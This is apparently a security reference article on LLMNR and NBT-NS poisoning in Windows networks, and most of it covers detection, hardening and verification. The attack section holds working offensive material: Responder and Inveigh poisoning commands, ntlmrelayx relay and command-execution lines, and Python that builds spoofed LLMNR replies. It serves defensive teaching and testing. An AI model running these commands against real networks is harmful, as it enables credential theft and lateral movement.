LLMNR and NBT-NS poisoning attack on Windows network

LLMNR and NBT-NS Poisoning

How Link-Local Multicast Name Resolution and NetBIOS Name Service poisoning attacks enable credential harvesting, NTLM relay, and lateral movement in Windows networks. Understanding and mitigating these legacy protocol vulnerabilities.

Description

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are legacy name resolution protocols used in Windows environments as fallback mechanisms when DNS fails to resolve a hostname. These protocols create significant security vulnerabilities that attackers can exploit to intercept network traffic, harvest credentials, and perform lateral movement attacks.

When a Windows system cannot resolve a hostname via DNS, it automatically falls back to multicasting an LLMNR query (and broadcasting an NBT-NS query) on the local segment, asking whether any machine owns the requested name. Because the requester accepts the first answer it receives, this fallback gives an attacker on the same segment the opportunity to:

  • Poison name resolution responses by spoofing legitimate services
  • Capture NTLMv1/NTLMv2 challenge/response pairs (Net-NTLM hashes) for offline cracking
  • Perform NTLM relay attacks to authenticate to other systems
  • Conduct Man-in-the-Middle (MitM) attacks to intercept sensitive communications
  • Establish persistent network access through compromised credentials

The vulnerability is particularly dangerous because these protocols operate by design without authentication or validation, making them inherently susceptible to spoofing attacks.

Legacy Protocol Risk

LLMNR and NBT-NS poisoning is among the most reliable credential-harvesting techniques available to an attacker who already has a foothold on a local network segment (a compromised host or a device plugged into the LAN). The protocols are enabled by default but rarely needed in modern networks with working DNS, so they create unnecessary attack surface.

Impact

  • Credential Harvesting: Capture NTLMv1/NTLMv2 challenge/response pairs (Net-NTLM hashes) for offline password cracking; NTLMv1 and weak passwords fall quickly
  • NTLM Relay Attacks: Use captured authentication to authenticate to other systems without cracking passwords
  • Lateral Movement: Leverage compromised credentials to access additional systems and resources
  • Privilege Escalation: Escalate privileges by capturing credentials from higher-privileged users
  • Persistent Access: Establish long-term network access through harvested domain credentials
  • Service Impersonation: Impersonate legitimate network services (SMB, HTTP, LDAP, etc.)
  • Data Interception: Intercept and modify network communications through MitM attacks
  • Domain Reconnaissance: Gather information about network topology, services, and user accounts

The impact is amplified in Active Directory environments where captured domain credentials can provide access to multiple systems and sensitive resources.

Technical Details

LLMNR (Link-Local Multicast Name Resolution)

  • Protocol: Operates over UDP port 5355
  • Scope: Multicast queries sent to 224.0.0.252 (IPv4) and FF02::1:3 (IPv6)
  • Fallback Order: Activated when DNS resolution fails
  • Authentication: No built-in authentication mechanism

NBT-NS (NetBIOS Name Service)

  • Protocol: Operates over UDP port 137
  • Scope: Broadcast queries sent to the local network segment
  • Legacy Support: Maintains compatibility with older Windows systems
  • Authentication: No authentication required for responses

Attack Methodology

  1. Monitoring: Attacker on the local segment listens for LLMNR (UDP 5355) and NBT-NS (UDP 137) queries, typically caused by mistyped hostnames, stale drive mappings, or WPAD lookups
  2. Response Spoofing: Attacker answers the query claiming to own the requested name, pointing it at the attacker's IP address
  3. Authentication Capture: Victim connects to the attacker's machine and authenticates (SMB, HTTP, LDAP, etc.) as the logged-on user
  4. Credential Extraction: Attacker records the NTLM challenge/response (Net-NTLMv1/v2) from that authentication
  5. Exploitation: The challenge/response is cracked offline, or the authentication is relayed in real time to another host that does not require signing
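Steps 2 and 3 at the packet level, as an added Python example that is not part of the original page or of any tool it names: it builds the LLMNR A query a Windows host multicasts after DNS fails, the spoofed reply a poisoner unicasts back, and parses both. It constructs bytes only and sends nothing; the hostname `fileshar3`, the transaction ID and the 192.0.2.66 responder address are made-up sample values.

```python
"""LLMNR on the wire: the victim's query and the poisoner's spoofed answer.

LLMNR (RFC 4795) reuses the DNS message format without name compression.
Nothing here sends traffic; build_* return bytes you could hand to a UDP socket.
"""
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # IPv4 multicast group and port
QTYPE_A, QCLASS_IN = 1, 1
FLAG_QR = 0x8000                                  # header bit 15: message is a response


def encode_name(name: str) -> bytes:
    """Length-prefixed labels terminated by a zero byte, e.g. b'\\x04wpad\\x00'."""
    labels = (bytes([len(lab)]) + lab.encode("ascii") for lab in name.split("."))
    return b"".join(labels) + b"\x00"


def decode_name(data: bytes, offset: int) -> tuple[str, int]:
    """Inverse of encode_name; returns (name, offset just past the terminator)."""
    labels = []
    while data[offset] != 0:
        length = data[offset]
        labels.append(data[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length
    return ".".join(labels), offset + 1


def build_query(txid: int, name: str) -> bytes:
    """What a Windows host multicasts to 224.0.0.252:5355 after DNS fails for `name`."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)      # QDCOUNT=1, no answers
    return header + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def build_poisoned_response(query: bytes, responder_ip: str, ttl: int = 30) -> bytes:
    """A poisoner's unicast reply: same ID, QR bit set, one A record pointing at itself.

    The name is never checked against anything, which is the whole vulnerability:
    whoever answers first wins, and there is no signature or server to validate.
    """
    txid, flags, _ = struct.unpack("!HHH", query[:6])
    name, end = decode_name(query, 12)
    question = query[12:end + 4]                               # QNAME + QTYPE + QCLASS
    header = struct.pack("!HHHHHH", txid, flags | FLAG_QR, 1, 1, 0, 0)   # ANCOUNT=1
    rr = encode_name(name) + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
    return header + question + rr + socket.inet_aton(responder_ip)


def parse(packet: bytes) -> dict:
    """Decode header, question and the first A answer (if any)."""
    txid, flags, _, ancount, _, _ = struct.unpack("!HHHHHH", packet[:12])
    name, off = decode_name(packet, 12)
    qtype, _ = struct.unpack("!HH", packet[off:off + 4])
    off += 4
    info = {"id": txid, "response": bool(flags & FLAG_QR), "name": name,
            "qtype": qtype, "answer": None}
    if ancount:
        _, off = decode_name(packet, off)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", packet[off:off + 10])
        off += 10
        if rtype == QTYPE_A and rdlen == 4:
            info["answer"] = socket.inet_ntoa(packet[off:off + 4])
            info["ttl"] = ttl
    return info


def demo_exchange(typo: str = "fileshar3", responder_ip: str = "192.0.2.66") -> tuple[dict, dict]:
    """Constructed exchange: a mistyped share name leaks to LLMNR and a poisoner answers.

    After this, the victim's SMB client connects to responder_ip:445 and performs
    NTLM authentication there, which is where the challenge/response is captured.
    """
    query = build_query(0x1234, typo)
    response = build_poisoned_response(query, responder_ip)
    return parse(query), parse(response)


if __name__ == "__main__":
    q, r = demo_exchange()
    print("query   :", q)
    print("response:", r)
```

The short TTL (30 seconds) mirrors what poisoning tools use: long enough for the victim to connect, short enough that the bogus entry does not linger in its cache. The same parser is what a sensor needs to notice that one host keeps answering for names it does not own.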

Common Attack Scenarios

Credential Harvesting with Responder

# Analyze mode: passively log LLMNR/NBT-NS/mDNS queries without answering them (no poisoning)
responder -I eth0 -A

# Active poisoning: answer spoofed names and capture NTLM authentication on the built-in SMB/HTTP/LDAP/etc. servers
responder -I eth0 -v

# Additionally run the rogue WPAD proxy and force proxy authentication to catch browser traffic
responder -I eth0 -w -P -v

NTLM Relay Attacks

# Relay captured authentication to SMB on hosts that do not require signing.
# In Responder.conf set SMB = Off and HTTP = Off first, so incoming authentication is relayed instead of captured.
# Build targets.txt from hosts without signing (e.g. CrackMapExec/NetExec smb --gen-relay-list).
ntlmrelayx.py -tf targets.txt -smb2support

# Execute a command on each target where the relayed account is a local administrator
ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

Inveigh (PowerShell-based)

# PowerShell LLMNR/NBT-NS poisoning
Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -Proxy Y

Detection

Network Monitoring

  • Traffic Analysis:

    • Monitor for unusual LLMNR queries (UDP 5355)
    • Track NBT-NS broadcast traffic (UDP 137)
    • Identify multiple responses to name resolution queries
    • Detect non-standard response patterns
  • DNS Monitoring:

    • Log failed DNS resolution attempts
    • Monitor for suspicious hostname patterns
    • Track resolution fallback behavior

Event Log Analysis

  • Windows Event Logs:

    # NTLM network logons (Logon Type 3, Authentication Package NTLM) from unexpected source hosts
    Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624,4625} |
        Where-Object { $_.Message -match 'Logon Type:\s+3' -and $_.Message -match 'NTLM' }

    # NTLM audit log (enable the "Network security: Restrict NTLM: Audit ..." policies first)
    # 8001 = outgoing NTLM to a remote server, 8002 = incoming NTLM, 8003/8004 = domain-wide audits recorded on domain controllers
    Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-NTLM/Operational'; ID=8001,8002,8003,8004}
  • Key Event IDs:

    • Event ID 4624: Successful logon; for this attack, Logon Type 3 with Authentication Package NTLM where the Source Network Address is not the workstation the user normally logs on from
    • Event ID 4625: Failed logon attempts (failed relays, or guesses with a cracked password)
    • Event ID 4648: Logon using explicit credentials
    • Event ID 4776: NTLM credential validation on the domain controller; in a relay the Source Workstation (copied from the victim's NTLM message) names the victim's machine while the target's 4624 shows the relaying host's IP

Security Tools Integration

  • SIEM Detection Rules:

    # Illustrative pseudo-rule (translate into your SIEM's query language)
    rule: LLMNR_NBTNS_Poisoning_Detection
    condition:
      - protocol: UDP
      - destination_port: [5355, 137]
      - one source answers >= 3 distinct names within 5 minutes      # a real host only owns its own name
      - OR the same name is answered by more than one source         # conflicting answers
      - OR any answer for a canary hostname that no host owns
    action: alert_high_priority
  • Network IDS/IPS: Configure signatures for LLMNR/NBT-NS anomalies

  • EDR Solutions: Monitor for Responder-like tools and suspicious network behavior
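The "multiple responses" and "source diversity" checks above in working form, as an added Python example (not from the page or any SIEM product). It runs over a constructed Zeek-style key=value log of LLMNR/NBT-NS traffic and flags a host that answers for many distinct names, a name claimed by more than one host, and any answer to a canary hostname that the defender queries on purpose but nobody owns. The log format, field names, IP addresses and canary name are assumptions.

```python
"""Flag LLMNR/NBT-NS poisoning in name-resolution logs.

Two invariants hold on a healthy segment: a host only answers for its own
name(s), and each name has one owner. A poisoner breaks both, and it will also
answer a canary name that we know nobody legitimately owns.
"""
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample in a Zeek-like key=value export (field names are assumed).
# 10.0.0.99 behaves like a poisoner: it answers every query, including the canary.
SAMPLE_LOG = """\
2024-05-02T09:14:03Z proto=LLMNR type=query src=10.0.0.21 name=fileshar3
2024-05-02T09:14:03Z proto=LLMNR type=response src=10.0.0.99 name=fileshar3 answer=10.0.0.99
2024-05-02T09:14:07Z proto=NBNS type=query src=10.0.0.34 name=PRINTSRV01
2024-05-02T09:14:07Z proto=NBNS type=response src=10.0.0.99 name=PRINTSRV01 answer=10.0.0.99
2024-05-02T09:14:12Z proto=LLMNR type=query src=10.0.0.21 name=wpad
2024-05-02T09:14:12Z proto=LLMNR type=response src=10.0.0.99 name=wpad answer=10.0.0.99
2024-05-02T09:14:30Z proto=LLMNR type=query src=10.0.0.50 name=WS-ACCT-07
2024-05-02T09:14:30Z proto=LLMNR type=response src=10.0.0.77 name=WS-ACCT-07 answer=10.0.0.77
2024-05-02T09:14:30Z proto=LLMNR type=response src=10.0.0.99 name=WS-ACCT-07 answer=10.0.0.99
2024-05-02T09:15:00Z proto=LLMNR type=query src=10.0.0.50 name=canary-nx-9f3a
2024-05-02T09:15:00Z proto=LLMNR type=response src=10.0.0.99 name=canary-nx-9f3a answer=10.0.0.99
"""

CANARY_NAMES = {"canary-nx-9f3a"}   # queried deliberately by a monitoring host; nobody owns them
DISTINCT_NAME_THRESHOLD = 3         # a host legitimately owns one or two names, not many


@dataclass(frozen=True)
class Finding:
    rule: str
    responder: str      # IP(s) that sent the suspicious response(s)
    detail: str


def parse_line(line: str) -> dict:
    """'ts k=v k=v ...' -> {'ts': ..., 'k': 'v', ...}"""
    ts, *pairs = line.split()
    record = {"ts": ts}
    for pair in pairs:
        key, _, value = pair.partition("=")
        record[key] = value
    return record


def detect(log_text: str) -> list[Finding]:
    records = [parse_line(line) for line in log_text.strip().splitlines()]
    responses = [r for r in records if r.get("type") == "response"]

    names_by_src = defaultdict(set)   # responder IP -> names it claimed
    srcs_by_name = defaultdict(set)   # name -> IPs that answered for it
    findings = []

    for r in responses:
        name = r["name"].lower()
        names_by_src[r["src"]].add(name)
        srcs_by_name[name].add(r["src"])
        if name in CANARY_NAMES:
            findings.append(Finding("canary_answered", r["src"],
                                    f"{r['proto']} answer for canary {r['name']} at {r['ts']}"))

    for src, names in names_by_src.items():
        if len(names) >= DISTINCT_NAME_THRESHOLD:
            findings.append(Finding("name_diversity", src,
                                    f"answered {len(names)} distinct names: {sorted(names)}"))

    for name, srcs in srcs_by_name.items():
        if len(srcs) > 1:
            findings.append(Finding("conflicting_answers", ",".join(sorted(srcs)),
                                    f"{name} claimed by more than one host"))
    return findings


def suspect_hosts(findings: list[Finding]) -> set[str]:
    """Hosts implicated by the per-responder rules (a conflict alone only says *someone* lied)."""
    return {f.responder for f in findings if f.rule in ("canary_answered", "name_diversity")}


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"[{f.rule}] {f.responder}: {f.detail}")
```

The canary rule is the cheapest and least noisy: a scheduled task on one monitoring host resolves a name that does not exist anywhere, so any answer at all is a poisoner. The diversity rule catches poisoners without a canary but needs the threshold tuned for hosts that legitimately own several names (clustered services, WINS proxies).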

Remediation

Disable Legacy Protocols

  • Group Policy Configuration:

    Computer Configuration → Policies → Administrative Templates → Network → DNS Client
    - "Turn off multicast name resolution": Enabled

    NBT-NS has no Group Policy setting of its own; disable NetBIOS over TCP/IP per adapter (registry or PowerShell below)
    or centrally via DHCP: vendor class "Microsoft Windows 2000 Options", option 001 "Microsoft Disable Netbios Option" = 0x2
  • Registry Modifications:

    # Disable LLMNR
    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient]
    "EnableMulticast"=dword:00000000

    # Disable NetBIOS over TCP/IP per interface (2 = disabled); Tcpip_{GUID} is a placeholder, repeat for each interface subkey
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_{GUID}]
    "NetbiosOptions"=dword:00000002

    # Weaker alternative: P-node (NodeType 2) resolves via WINS only and stops NBT-NS broadcasts, but leaves NetBIOS itself enabled
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
    "NodeType"=dword:00000002
  • PowerShell Commands:

    # Disable LLMNR via PowerShell (create the policy key if it does not exist yet, overwrite an existing value)
    $key = "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient"
    New-Item -Path $key -Force | Out-Null
    New-ItemProperty -Path $key -Name "EnableMulticast" -Value 0 -PropertyType DWord -Force | Out-Null

    # Disable NetBIOS over TCP/IP on every IP-enabled adapter (TcpipNetbiosOptions 2 = disable)
    Get-CimInstance Win32_NetworkAdapterConfiguration -Filter "IPEnabled = TRUE" | ForEach-Object {
        Invoke-CimMethod -InputObject $_ -MethodName SetTcpipNetbios -Arguments @{ TcpipNetbiosOptions = 2 } | Out-Null
    }

Network Segmentation

  • VLAN Isolation: Implement network segmentation to limit broadcast domains
  • Micro-segmentation: Use software-defined networking for granular traffic control
  • Network Access Control (NAC): Implement 802.1X authentication for network access

SMB Security Hardening

  • Enable SMB Signing:

    # Require SMB signing on servers: this is what defeats relay, because the relaying attacker never learns the
    # session key needed to sign. Apply it to every potential relay target, not only domain controllers (which already require it).
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
    "RequireSecuritySignature"=dword:00000001

    # Require SMB signing on clients too. This does not stop hash capture: the client completes NTLM authentication
    # with the rogue server before signing is verified, so the challenge/response is still recorded.
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters]
    "RequireSecuritySignature"=dword:00000001
  • Group Policy Settings:

    Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options
    - "Microsoft network client: Digitally sign communications (always)": Enabled
    - "Microsoft network server: Digitally sign communications (always)": Enabled

Authentication Security

  • Implement Multi-Factor Authentication (MFA):

    • Deploy MFA for all privileged accounts
    • Use Azure AD Conditional Access policies
    • Implement FIDO2/Windows Hello for Business
    • Note that MFA on interactive logons does not stop NTLM capture or relay, which happen after the user is already logged on; its value here is limiting what a password cracked from a captured hash can be used for
  • Password Security:

    • Enforce strong password policies
    • Implement password rotation for service accounts
    • Use Group Managed Service Accounts (gMSA)

Prevention

DNS Infrastructure Hardening

  • Reliable DNS Services:

    • Implement redundant DNS servers
    • Use DNS forwarders and conditional forwarding
    • Monitor DNS resolution success rates
  • DNS Security Extensions:

    • Deploy DNSSEC where possible
    • Implement DNS filtering and monitoring
    • Use secure DNS over HTTPS (DoH) or DNS over TLS (DoT)
    • Note that these protect DNS answers themselves; they do not stop the resolver from falling back to LLMNR/NBT-NS when DNS returns no answer, so they complement rather than replace disabling the protocols

Network Architecture

  • Zero Trust Networking:

    • Implement explicit verification for all network communications
    • Use least-privilege access principles
    • Deploy continuous monitoring and verification
  • Network Monitoring:

    # Listener check on a Windows host: after hardening, no UDP listener should remain on 137 (NBT-NS) or 5355 (LLMNR)
    Get-NetUDPEndpoint | Where-Object {$_.LocalPort -eq 137 -or $_.LocalPort -eq 5355}
    # TCP 445 (SMB) listening is normal; TCP 139 (NetBIOS session service) disappears once NetBIOS over TCP/IP is off
    Get-NetTCPConnection -State Listen | Where-Object {$_.LocalPort -eq 445 -or $_.LocalPort -eq 139}

Security Awareness Training

  • User Education:

    • Train users on social engineering tactics
    • Educate about suspicious network behavior
    • Implement security awareness programs
  • Administrative Training:

    • Train IT staff on legacy protocol risks
    • Provide guidance on secure network configuration
    • Implement incident response procedures

Verification

Testing Network Configuration

  • Verify Protocol Disablement:

    # Check LLMNR status (0 = disabled; no value means the policy is not set and LLMNR is on)
    Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" -Name "EnableMulticast" -ErrorAction SilentlyContinue

    # Check NetBIOS configuration (TcpipNetbiosOptions: 0 = from DHCP, 1 = enabled, 2 = disabled)
    Get-CimInstance Win32_NetworkAdapterConfiguration -Filter "IPEnabled = TRUE" | Select-Object Description, TcpipNetbiosOptions
  • Network Testing:

    # From a Windows client, resolve a single-label name that does not exist in DNS through the system resolver.
    # (nslookup talks to the DNS server directly and never triggers the LLMNR/NBT-NS fallback, so it proves nothing here.)
    ping nonexistent-host-zz9

    # Meanwhile, on a Linux host in the same segment: a hardened client sends no LLMNR or NBT-NS query at all
    sudo tcpdump -ni eth0 'udp port 5355 or udp port 137'

    # Check for NBT-NS responses (Samba node-status query); a host with NetBIOS over TCP/IP disabled does not answer
    nmblookup -A <target_ip>

Security Assessment

  • Penetration Testing: Include LLMNR/NBT-NS poisoning in security assessments
  • Red Team Exercises: Simulate attacks using Responder and similar tools
  • Blue Team Validation: Test detection capabilities and response procedures

Advanced Mitigations

Application Control

  • Windows Defender Application Control (WDAC):

    <!-- Policy rule-options fragment. UMCI is what makes WDAC govern user-mode binaries and scripts such as Inveigh;
         WDAC only controls managed Windows hosts and cannot stop Responder on an attacker-owned device. -->
    <Rules>
      <Rule>
        <Option>Enabled:UMCI</Option>
      </Rule>
      <Rule>
        <Option>Enabled:Unsigned System Integrity Policy</Option>
      </Rule>
    </Rules>
  • AppLocker Policies:

    • Block execution of known attack tools
    • Implement executable whitelisting
    • Monitor for policy violations

Network-Level Protection

  • 802.1X Authentication:

    • Implement port-based network access control
    • Use certificate-based authentication where possible
    • Network Access Protection (NAP) is deprecated and removed from current Windows Server; use a supported NAC/posture solution instead
  • DHCP Security:

    • Implement DHCP snooping
    • Use DHCP reservations for critical systems
    • Monitor for rogue DHCP servers


Next Steps

If LLMNR and NBT-NS poisoning vulnerabilities are found during testing:

  • Immediately disable legacy protocols on all Windows systems
  • Implement SMB signing to prevent NTLM relay attacks
  • Review captured credentials and force password resets for compromised accounts

Takeaway: LLMNR and NBT-NS poisoning attacks represent fundamental security weaknesses in default Windows configurations. Organizations must disable these legacy protocols, implement network segmentation, and deploy comprehensive monitoring to protect against credential harvesting and lateral movement attacks. Make legacy protocol remediation a priority security initiative.
